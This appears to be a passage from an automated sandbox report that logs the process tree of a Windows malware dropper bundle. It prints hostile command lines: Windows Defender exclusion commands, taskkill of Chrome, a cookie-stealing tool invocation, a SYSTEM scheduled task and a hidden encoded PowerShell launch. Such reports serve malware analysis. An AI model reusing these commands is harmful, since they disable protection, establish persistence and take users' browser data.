C:\Users\Admin\AppData\Local\Temp\is-D974T.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-D974T.tmp\Setup.tmp" /SL5="$204F6,298214,214528,C:\Users\Admin\AppData\Local\Temp\is-2LCHJ.tmp\Setup.exe" /VERYSILENT22⤵PID:8048
-
C:\Users\Admin\AppData\Local\Temp\is-H535U.tmp\HGT.exe"C:\Users\Admin\AppData\Local\Temp\is-H535U.tmp\HGT.exe" /S /UID=lab21423⤵
- Drops file in Drivers directory
PID:5984 -
C:\Users\Admin\AppData\Local\Temp\8b-e441d-7e2-b6992-dc81742cdbcc7\Vulolozhoje.exe"C:\Users\Admin\AppData\Local\Temp\8b-e441d-7e2-b6992-dc81742cdbcc7\Vulolozhoje.exe"24⤵PID:4084
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\y13xwjdz.lak\gaooo.exe & exit25⤵PID:6992
-
C:\Users\Admin\AppData\Local\Temp\y13xwjdz.lak\gaooo.exeC:\Users\Admin\AppData\Local\Temp\y13xwjdz.lak\gaooo.exe26⤵PID:4744
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt27⤵PID:2076
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt27⤵PID:8008
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\o03lfmrs.enf\md7_7dfj.exe & exit25⤵PID:5988
-
C:\Users\Admin\AppData\Local\Temp\o03lfmrs.enf\md7_7dfj.exeC:\Users\Admin\AppData\Local\Temp\o03lfmrs.enf\md7_7dfj.exe26⤵
- Checks whether UAC is enabled
PID:7192 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tw1ebwlk.5xj\askinstall29.exe & exit25⤵PID:7436
-
C:\Users\Admin\AppData\Local\Temp\tw1ebwlk.5xj\askinstall29.exeC:\Users\Admin\AppData\Local\Temp\tw1ebwlk.5xj\askinstall29.exe26⤵PID:7540
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe27⤵PID:7476
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe28⤵
- Kills process with taskkill
PID:5744 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\iilqxkbf.nua\customer4.exe & exit25⤵PID:3380
-
C:\Users\Admin\AppData\Local\Temp\iilqxkbf.nua\customer4.exeC:\Users\Admin\AppData\Local\Temp\iilqxkbf.nua\customer4.exe26⤵PID:4384
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\main.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\main.exe"27⤵PID:5540
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2uz1tcu2.tho\HookSetp.exe & exit25⤵PID:8124
-
C:\Users\Admin\AppData\Local\Temp\2uz1tcu2.tho\HookSetp.exeC:\Users\Admin\AppData\Local\Temp\2uz1tcu2.tho\HookSetp.exe26⤵PID:4360
-
C:\ProgramData\3094530.34"C:\ProgramData\3094530.34"27⤵PID:7936
-
C:\ProgramData\7577180.83"C:\ProgramData\7577180.83"27⤵
- Suspicious behavior: SetClipboardViewer
PID:6860 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yja1esig.ptf\GcleanerWW.exe /mixone & exit25⤵PID:7016
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3liwem5d.ise\privacytools5.exe & exit25⤵PID:4836
-
C:\Users\Admin\AppData\Local\Temp\3liwem5d.ise\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\3liwem5d.ise\privacytools5.exe26⤵
- Suspicious use of SetThreadContext
PID:6988 -
C:\Users\Admin\AppData\Local\Temp\3liwem5d.ise\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\3liwem5d.ise\privacytools5.exe27⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:1420 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\izczjqxw.frt\setup.exe /8-2222 & exit25⤵PID:4908
-
C:\Users\Admin\AppData\Local\Temp\izczjqxw.frt\setup.exeC:\Users\Admin\AppData\Local\Temp\izczjqxw.frt\setup.exe /8-222226⤵
- Drops file in Program Files directory
PID:6736 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\White-Pond"27⤵PID:2024
-
C:\Program Files (x86)\White-Pond\7za.exe"C:\Program Files (x86)\White-Pond\7za.exe" e -p154.61.71.51 winamp-plugins.7z27⤵PID:6416
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\White-Pond\setup.exe" -map "C:\Program Files (x86)\White-Pond\WinmonProcessMonitor.sys""27⤵
- Blocklisted process makes network request
PID:7288 -
C:\Program Files (x86)\White-Pond\setup.exe"C:\Program Files (x86)\White-Pond\setup.exe" -map "C:\Program Files (x86)\White-Pond\WinmonProcessMonitor.sys"28⤵
- Drops file in Program Files directory
- Suspicious behavior: LoadsDriver
PID:4568 -
C:\Program Files (x86)\White-Pond\7za.exe"C:\Program Files (x86)\White-Pond\7za.exe" e -p154.61.71.51 winamp.7z27⤵PID:6316
-
C:\Program Files (x86)\White-Pond\setup.exe"C:\Program Files (x86)\White-Pond\setup.exe" /8-222227⤵PID:7972
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\znsxvxcd.iys\MultitimerFour.exe & exit25⤵PID:5596
-
C:\Users\Admin\AppData\Local\Temp\znsxvxcd.iys\MultitimerFour.exeC:\Users\Admin\AppData\Local\Temp\znsxvxcd.iys\MultitimerFour.exe26⤵PID:7288
-
C:\Users\Admin\AppData\Local\Temp\VFHCJZLXJ8\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\VFHCJZLXJ8\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 10427⤵
- Drops file in Windows directory
PID:2680 -
C:\Users\Admin\AppData\Local\Temp\VFHCJZLXJ8\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\VFHCJZLXJ8\multitimer.exe" 1 3.1616096033.6053ab211c493 10428⤵PID:4108
-
C:\Users\Admin\AppData\Local\Temp\VFHCJZLXJ8\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\VFHCJZLXJ8\multitimer.exe" 2 3.1616096033.6053ab211c49329⤵
- Checks for any installed AV software in registry
- Maps connected drives based on registry
- Enumerates system info in registry
PID:7904 -
C:\Users\Admin\AppData\Local\Temp\adjoqzbojts\AwesomePoolU1.exe"C:\Users\Admin\AppData\Local\Temp\adjoqzbojts\AwesomePoolU1.exe"30⤵PID:4264
-
C:\Users\Admin\AppData\Local\Temp\nj1hrmonrch\vict.exe"C:\Users\Admin\AppData\Local\Temp\nj1hrmonrch\vict.exe" /VERYSILENT /id=53530⤵PID:4432
-
C:\Users\Admin\AppData\Local\Temp\is-EM68L.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-EM68L.tmp\vict.tmp" /SL5="$604EA,870426,780800,C:\Users\Admin\AppData\Local\Temp\nj1hrmonrch\vict.exe" /VERYSILENT /id=53531⤵
- Drops file in Program Files directory
PID:6672 -
C:\Users\Admin\AppData\Local\Temp\is-9OFAL.tmp\wimapi.exe"C:\Users\Admin\AppData\Local\Temp\is-9OFAL.tmp\wimapi.exe" 53532⤵PID:7116
-
C:\Users\Admin\AppData\Local\Temp\myxlls33ato\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\myxlls33ato\Setup3310.exe" /Verysilent /subid=57730⤵PID:4232
-
C:\Users\Admin\AppData\Local\Temp\is-I1F97.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-I1F97.tmp\Setup3310.tmp" /SL5="$A03B2,138429,56832,C:\Users\Admin\AppData\Local\Temp\myxlls33ato\Setup3310.exe" /Verysilent /subid=57731⤵PID:5372
-
C:\Users\Admin\AppData\Local\Temp\is-0S2T5.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-0S2T5.tmp\Setup.exe" /Verysilent32⤵PID:5448
-
C:\Users\Admin\AppData\Local\Temp\is-TITM7.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-TITM7.tmp\Setup.tmp" /SL5="$70492,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-0S2T5.tmp\Setup.exe" /Verysilent33⤵PID:7628
-
C:\Users\Admin\AppData\Local\Temp\gd3mptfi5wm\askinstall24.exe"C:\Users\Admin\AppData\Local\Temp\gd3mptfi5wm\askinstall24.exe"30⤵PID:7544
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe31⤵
- Blocklisted process makes network request
PID:7840 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe32⤵
- Kills process with taskkill
PID:8152 -
C:\Users\Admin\AppData\Local\Temp\oh2vftnkx1k\axl4f0wpmpz.exe"C:\Users\Admin\AppData\Local\Temp\oh2vftnkx1k\axl4f0wpmpz.exe" /ustwo INSTALL30⤵PID:6936
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6936 -s 64831⤵
- Program crash
PID:7392 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6936 -s 66031⤵
- Program crash
PID:6840 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6936 -s 66431⤵
- Program crash
PID:7680 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6936 -s 62431⤵
- Program crash
PID:7436 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6936 -s 89231⤵
- Program crash
PID:5928 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6936 -s 92831⤵
- Program crash
PID:1424 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6936 -s 108431⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:6820 -
C:\Users\Admin\AppData\Local\Temp\V8BH4H78GA\setups.exe"C:\Users\Admin\AppData\Local\Temp\V8BH4H78GA\setups.exe" ll27⤵PID:5292
-
C:\Users\Admin\AppData\Local\Temp\is-823JG.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-823JG.tmp\setups.tmp" /SL5="$C0056,549376,61440,C:\Users\Admin\AppData\Local\Temp\V8BH4H78GA\setups.exe" ll28⤵
- Checks computer location settings
PID:7744 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dv5b544b.va0\setup.exe /S /kr /site_id=754 & exit25⤵PID:1768
-
C:\Users\Admin\AppData\Local\Temp\dv5b544b.va0\setup.exeC:\Users\Admin\AppData\Local\Temp\dv5b544b.va0\setup.exe /S /kr /site_id=75426⤵
- Checks BIOS information in registry
- Drops file in System32 directory
- Enumerates system info in registry
PID:7448 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"27⤵PID:3372
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&28⤵PID:6656
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:3229⤵PID:4596
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:6429⤵PID:6116
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "grYqnaYKY" /SC once /ST 12:23:13 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="27⤵
- Creates scheduled task(s)
PID:7592 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "grYqnaYKY"27⤵PID:6908
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "grYqnaYKY"27⤵PID:5288
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "byGaxHSkIutywxzLoY" /SC once /ST 19:31:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\StaKeEcTUUQSXRfzM\pZTOAVEJdtvzpHa\nmCTJSH.exe\" yu /site_id 754 /S" /V1 /F27⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:6652 -
C:\Users\Admin\AppData\Local\Temp\is-HEM8M.tmp\hjjgaa.exe"C:\Users\Admin\AppData\Local\Temp\is-HEM8M.tmp\hjjgaa.exe" /Verysilent19⤵PID:2924
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt20⤵PID:7260
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt20⤵PID:7460
-
C:\Users\Admin\AppData\Local\Temp\cjviz2sr1ne\fdrnjk1bsri.exe"C:\Users\Admin\AppData\Local\Temp\cjviz2sr1ne\fdrnjk1bsri.exe" /ustwo INSTALL15⤵PID:5348
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5348 -s 65216⤵
- Executes dropped EXE
- Program crash
- Checks SCSI registry key(s)
- Suspicious use of SetWindowsHookEx
PID:5380 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5348 -s 64016⤵
- Program crash
PID:8056 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5348 -s 77216⤵
- Program crash
PID:7216 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5348 -s 80816⤵
- Program crash
PID:7080 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5348 -s 88016⤵
- Program crash
PID:5560 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5348 -s 92816⤵
- Program crash
PID:7608 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5348 -s 108416⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:4188 -
C:\Users\Admin\AppData\Local\Temp\4lsiwmsl451\askinstall24.exe"C:\Users\Admin\AppData\Local\Temp\4lsiwmsl451\askinstall24.exe"15⤵PID:4392
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe16⤵PID:5716
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe17⤵
- Kills process with taskkill
PID:6864 -
C:\Users\Admin\AppData\Local\Temp\ivyuhrseafl\app.exe"C:\Users\Admin\AppData\Local\Temp\ivyuhrseafl\app.exe" /8-2315⤵
- Loads dropped DLL
- Drops file in Program Files directory
PID:5520 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Delicate-Fire"16⤵PID:6180
-
C:\Program Files (x86)\Delicate-Fire\7za.exe"C:\Program Files (x86)\Delicate-Fire\7za.exe" e -p154.61.71.51 winamp-plugins.7z16⤵
- Drops file in Program Files directory
PID:6752 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Delicate-Fire\app.exe" -map "C:\Program Files (x86)\Delicate-Fire\WinmonProcessMonitor.sys""16⤵
- Blocklisted process makes network request
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
PID:888 -
C:\Program Files (x86)\Delicate-Fire\app.exe"C:\Program Files (x86)\Delicate-Fire\app.exe" -map "C:\Program Files (x86)\Delicate-Fire\WinmonProcessMonitor.sys"17⤵PID:6444
-
C:\Program Files (x86)\Delicate-Fire\7za.exe"C:\Program Files (x86)\Delicate-Fire\7za.exe" e -p154.61.71.51 winamp.7z16⤵
- Drops file in Program Files directory
PID:7348 -
C:\Program Files (x86)\Delicate-Fire\app.exe"C:\Program Files (x86)\Delicate-Fire\app.exe" /8-2316⤵PID:4292
-
C:\Program Files (x86)\Delicate-Fire\app.exe"C:\Program Files (x86)\Delicate-Fire\app.exe" /8-2317⤵
- Modifies data under HKEY_USERS
PID:7980 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zp2mqiw0.wdc\setup.exe /S /kr /site_id=754 & exit10⤵PID:6920
-
C:\Users\Admin\AppData\Local\Temp\zp2mqiw0.wdc\setup.exeC:\Users\Admin\AppData\Local\Temp\zp2mqiw0.wdc\setup.exe /S /kr /site_id=75411⤵
- Checks BIOS information in registry
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
PID:6960 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"12⤵PID:6128
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&13⤵PID:7912
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:3214⤵PID:6516
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:6414⤵PID:3948
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gycJxElrw" /SC once /ST 18:18:48 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="12⤵
- Creates scheduled task(s)
PID:2776 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gycJxElrw"12⤵PID:6188
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gycJxElrw"12⤵PID:6104
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV113⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:6456 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "byGaxHSkIutywxzLoY" /SC once /ST 19:30:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\StaKeEcTUUQSXRfzM\pZTOAVEJdtvzpHa\LSujfCV.exe\" yu /site_id 754 /S" /V1 /F12⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:6812 -
C:\Users\Admin\AppData\Local\Temp\is-HLI6I.tmp\hjjgaa.exe"C:\Users\Admin\AppData\Local\Temp\is-HLI6I.tmp\hjjgaa.exe" /Verysilent4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:5640 -
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4728 -
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
- Suspicious use of SetWindowsHookEx
PID:3176
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5256
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:5356
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:1140
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
PID:5688
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\34a7ae7cb22b462fb09ba2f131dba30b /t 5468 /p 56881⤵PID:6684
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:7120
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall1⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
PID:6616 -
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{4dfdd2be-834c-1f4c-9ef9-3552e4d15a00}\oemvista.inf" "9" "4d14a44ff" "0000000000000164" "WinSta0\Default" "0000000000000168" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
PID:7004 -
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000174"2⤵
- Drops file in Drivers directory
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
PID:8036
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s seclogon1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:7944
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵
- Checks SCSI registry key(s)
PID:1256
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc1⤵PID:5944
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:6288
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\eb1f1a6ed7dc4a0c9e5060b2efa3a370 /t 0 /p 62881⤵PID:7308
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵PID:6376
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe"1⤵
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies data under HKEY_USERS
PID:7228 -
C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exeMaskVPNUpdate.exe /silent2⤵
- Drops file in Program Files directory
PID:3208
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:5672
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:8064
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:2908
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:5940
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
PID:6300
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:5692
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:4716
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}1⤵
- Drops file in Program Files directory
- Suspicious behavior: LoadsDriver
PID:6444
-
C:\Users\Admin\AppData\Local\Temp\StaKeEcTUUQSXRfzM\pZTOAVEJdtvzpHa\LSujfCV.exeC:\Users\Admin\AppData\Local\Temp\StaKeEcTUUQSXRfzM\pZTOAVEJdtvzpHa\LSujfCV.exe yu /site_id 754 /S1⤵
- Drops file in System32 directory
PID:4616 -
